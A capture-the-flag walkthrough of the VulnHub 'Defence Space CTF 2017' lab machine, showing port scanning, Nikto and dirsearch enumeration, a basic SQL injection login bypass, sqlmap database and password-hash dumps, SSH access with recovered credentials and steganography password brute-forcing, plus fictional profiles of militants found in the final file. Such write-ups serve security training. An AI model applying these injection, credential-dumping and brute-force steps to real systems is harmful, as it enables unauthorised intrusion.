Defence Space CTF: 2017
Location
https://download.vulnhub.com/defencectf2017/DEFENCESPACECTF-2017.ova
Description
The story line on the CTF is based on true life happening in Northern Nigeria, however the author has adopted the code name “Operation Lafia dole”.
The exercise start from simple information gathering, which is applicable to both military and cyber based operation, to complex infiltration and encryption been used by intelligence agency around the world to pass out secret.
It has 7 flags to be captured.
Getting started
Because the box runs on a static IP adres I need to change my network settings of Vbox. When that’s done I can start with a port/service scan.
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -p- 192.168.56.20 Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-27 18:00 CEST Nmap scan report for 192.168.56.20 Host is up (0.0025s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM... 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Operation LAFIYA DOLE CTF 2017 - INFLITRATE THE OPERATION COMM... | ssl-cert: Subject: commonName=Flag3[19c562a36aeb455d093b4f5236f]+[39 39 30]/organizationName=Silex Secure Lab Ltd/stateOrProvinceName=Abuja/countryName=NG | Not valid before: 2017-01-24T12:54:41 |_Not valid after: 2018-01-24T12:54:41 |_ssl-date: ERROR: Script execution failed (use -d to debug) 2225/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f6:f0:08:c9:4d:16:3d:fd:e7:b8:51:d7:b6:57:48:5d (RSA) |_ 256 c2:2b:6e:83:8a:00:67:c2:39:62:16:5e:f9:01:ee:fe (ECDSA) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 123.47 seconds
FTP, HTTP, HTTPS and SSH on a non-standard port. Let’s get a feel of the challenge.
In the source code of the page there is an interesting piece.
<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/skel.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="RmxhZyAwIChuZXRkaXNjb3Zlcik="></script>
<script src="assets/lafiya.js"></script><![Make sure you stick to intel gathering agent]<!-->
┌─[n13mant@planetmars]─[~] └──╼ $echo 'RmxhZyAwIChuZXRkaXNjb3Zlcik=' | base64 -d Flag 0 (netdiscover)
Uhm….first flag?
Next I examine the javascript files. ‘/assets/lafiya.js’ had 2 things that caught my eye.
/* 46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a*/
└──╼ $echo '46 6c 61 67 20 32 20 39 61 38 37 38 30 32 38 31 64 33 65 33 37 63 35 39 37 63 65 65 37 63 61 35 38 62 66 64 34 33 35 0a' | xxd -r -p Flag 2 9a8780281d3e37c597cee7ca58bfd435
Flag number 2. Which looks like a MD5 string.
9a8780281d3e37c597cee7ca58bfd435 -> Nmap
The second thing was in the same file.
/* Beheaded Air Force */ /* There is a big shoe to fill. Lord I need your feet.. 11/08/2014 c.hedima@airforce.mil.ng maps/kanuri/Borno/@11.8664433,10.9088387,7z/data=!3m1!4b1!4m5!3m4!1s0x111b0751329a9727:0xe4d749d5b2177a1d!8m2!3d11.5097479!4d12.9789121 Bama1987 */
Next I ran Nikto.
┌─[n13mant@planetmars]─[~] └──╼ $nikto -h 'http://192.168.56.20/' - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.20 + Target Hostname: 192.168.56.20 + Target Port: 80 + Start Time: 2017-03-27 19:36:20 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0xf7d 0x549619ce6fe2c + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/". + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow + Uncommon header 'x-ob_mode' found, with contents: 1 + /info.php: Output from the phpinfo() function was found. + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found. + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/ + /phpmyadmin/: phpMyAdmin directory found + 7686 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2017-03-27 19:37:10 (GMT2) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
- phpinfo() found
- phpMyAdmin found
When I connect with the SSH server I get another flag.
┌─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.56.20 -p 2225
The authenticity of host '[192.168.56.20]:2225 ([192.168.56.20]:2225)' can't be established.
ECDSA key fingerprint is SHA256:8sIalXp1GsXRzq1v9LpWHz84w229mDlUIjrc9Ahm3lU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.20]:2225' (ECDSA) to the list of known hosts.
###############################################################################################
WARNING
DHQ:NIG DSS-NIG DIA-NIG - Authorized Access Only!
Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
All actions Will be Closely Monitored and Recorded by Cam7
Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
53c82eba31f6d416f331de9162ebe997 -> encrypt
Encrypt…..looks like I’m being guided to the HTTPS server.
Inside the SSL certificate there is another flag. But this time there is something added to it.
19c562a36aeb455d09534f93b4f5236f -> Unit
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo '39 39 30' | xxd -r -p 990
Unit+990 = Unit990
After a while and a few tries with the idea of this being an username, I tried it in my browser as a folder.
In the source code there is a comment.
<!-- "Every intelligence Analysis system must be rooted in a strong understanding of agent's access written for." - ZmxhZyA0IHthZG1pbi5waHB9 -->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA0IHthZG1pbi5waHB9' | base64 -d
flag 4 {admin.php}
At the bottom there was a final comment.
<!--
//////////////////////////////////////////////////////////////////////////////////////////////////////
// Defence| DIA| FIB | AIRFORCE| NAVY| DSA| client authenticated connections to 2225 classified // // //
// //
// .--Entering is a process here //
// | .--hypothetical Base64 Encoded //
// v v //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']); //
// //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
When I follow the clue from the previous flag (admin.php) I get another login screen.
Again I check the source code. Another interesting comment but with a slight twist.
<!--
//////////////////////////////////////////////////////////////////////////////////////////////////////
// update() sets the value of a column given a condition //
// //
// .--escaping is automatic here //
// | .--hypothetical RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ== //
// v v //
//Db()->update('name',$_GET['newname'])->where(' id = '.$_GET['id']); //
// //
///////////////////////////////////////////////////////////////////////////////////////////////////////
-->
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'RmxhZyA1IHtTUUwgaW5qZWN0aW9ufQ==' | base64 -d
Flag 5 {SQL injection}
Time to put sqlmap to work.
available databases [7]: [*] db_audit [*] Dhqctf [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] silex
database management system users password hashes:
[*] phpmyadmin [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
Database: silex [6 tables] +--------------+ | admin | | categories | | customers | | formula | | home_type | | sub_category | +--------------+
Database: silex Table: admin [1 entry] +----+--------------------------------------+ | id | code | +----+--------------------------------------+ | 1 | ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ== | +----+--------------------------------------+
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'ZmxhZyA2IHtOaWdhaXJmb3JjZWNsb3VkfQ==' | base64 -d
flag 6 {Nigairforcecloud}
When I searched my notes for something with ‘airforce’ I noticed I missed a previous clue inside a comment I found earlier. There was a piece of code inside the comment that was very interesting.
Db()->update('name',$_GET['newname'])->where(' id = '.$_GET[''or'1'='1']);
Let’s try that basic piece of SQL injection on the login page from earlier.
┌─[n13mant@planetmars]─[~] └──╼ $echo 'RGVmYXVsdEAxMg==' | base64 -d Default@12
That looks like an invitation to a SSH visit.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh abuali@192.168.56.20 -p 2225
###############################################################################################
WARNING
DHQ:NIG DSS-NIG DIA-NIG - Authorized Access Only!
Disconnect IMMEDIATELY if you are not an authorized User in Operation Lafia Dole
All actions Will be Closely Monitored and Recorded by Cam7
Flag2B[53c82eba31f6d416f331de9162ebe997]
################################################################################################
abuali@192.168.56.20's password:
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-39-generic i686)
Last login: Sat Feb 25 21:56:08 2017 from 192.168.56.20
abuali@server1:~$ id
uid=1002(abuali) gid=1002(abuali) groups=1002(abuali)
abuali@server1:/home/silex/OperationLafia$ uname -a Linux server1 4.8.0-39-generic #42-Ubuntu SMP Mon Feb 20 11:46:49 UTC 2017 i686 i686 i686 GNU/Linux abuali@server1:/home/silex/OperationLafia$ cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.10 DISTRIB_CODENAME=yakkety DISTRIB_DESCRIPTION="Ubuntu 16.10" NAME="Ubuntu" VERSION="16.10 (Yakkety Yak)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.10" VERSION_ID="16.10" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=yakkety UBUNTU_CODENAME=yakkety
After some time inside this box I start to think this was a waste of time and I got side-tracked. Time for the admin login page and inject there some SQLi.
Fun that I got access, but this system didn’t gave me any direction on how to go on. It felt like a dead-end. Because there was a lot of information gathered I created a list with everything I found and ran it through dirsearch.
┌─[n13mant@planetmars]─[~/dirsearch] └──╼ $python3 dirsearch.py -u http://192.168.56.20/ -e php,hmtl -x 301,404,405 -w ~/Desktop/words.dic _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php, hmtl | Threads: 10 | Wordlist size: 277315 Error Log: /home/n13mant/dirsearch/logs/errors-17-03-30_16-49-18.log Target: http://192.168.56.20/ [16:49:18] Starting: [16:49:18] 200 - 4KB - / [16:49:18] 200 - 4KB - / [.....SNIP.....] [16:58:23] 401 - 460B - /Nigairforcecloud [.....SNIP.....] [17:12:11] 200 - 4KB - / Task Completed
401….restricted access. Bummer. But the funny thing is……when I use port 443 I don’t need any credentials to enter. The gate is wide open.
On entering I get flag number 7. Which should be the end of this funny but strange CTF.
3aa652f41d8b4a23e17937149c784868 -> widgets
But why would there be a clue inside the last and final flag? Because there is a button on the left of the dashboard that’s called ‘widgets’ I guess I’m not done yet.
There is a sound file and an image to be downloaded. As there is nothing else in here and the clue pointed directly to this page I guess there is some steganography in place. Unfortunately I need a password.
Because there is no clue where the password can be found I need to create a wordlist. Because this CTF has a story to tell, there is a lot of information throughout all the files on the website. To make the wordlist I copy the content of every file into 1 text file. With ‘sort’ and ‘grep’ I filter this file so it will consist of strings from 5 chars and more. I did it this way, because CeWL only filters out letters and nothing else. With this list I tried to brute-force both files.
┌─[n13mant@planetmars]─[~/stegbrute] └──╼ $python steg_brute.py -b -d ~/Desktop/words.dic -f ~/Desktop/Alfajet106.wav [i] Searching... 53%|############################ | wrote extracted data to "/home/n13mant/Desktop/Alfajet106_flag.txt". [+] Information obtained with password: Bama1987 Imam Abubakar Shekau Mobile Number : 091778383990 Email:abubakar.shekau@arimblog Location : Alfata street, Behind A.g Station Borno state Height : 7.0 Age : 40 Language : English , Kanuri, Hausa. Religion : Bank Account : 08878711776 Habibu Yusuf (a.k.a Asalafi) Mobile Number : 091778383910 Email:abubakar.HabibuYusuf1@arimblog.com Location : Sambisa forest Borno state Height : 4.0 Age : 25 Language : English , Kanuri, Hausa. Religion : Bank Account : 08878711777 Khalid Albarnawai Mobile Number : 091778383992 Email:abubakar.khalidbaba@arimblog Location : Maiduguri, Borno State, Nigeria Height : 7.0 DOB : 1976 Language : English , Kanuri, Hausa. Religion : Bank Account : 08878711778 Momodu Bama Mobile Number : 091778383993 Email:bamamomodu@arimblog Location : Alfata street, Behind A.g Station Borno state Height : 7.0 Language : English , Kanuri, Hausa. Religion : Bank Account : 08878711779
Guess that is it. Nothing really that marks the end.
Conclusion
This CTF was a strange one at best. No real techniques were needed and it felt more like a goose hunt. The creators really wanted to tell a story, but missed out with the challenging part. I always enjoy a themed CTF, but this one was a bit too much theme.
I have fun with, cause I discovered exactly what I was looking for.
You’ve ended my four day lengthy hunt! God Bless you man. Have a great day.
Bye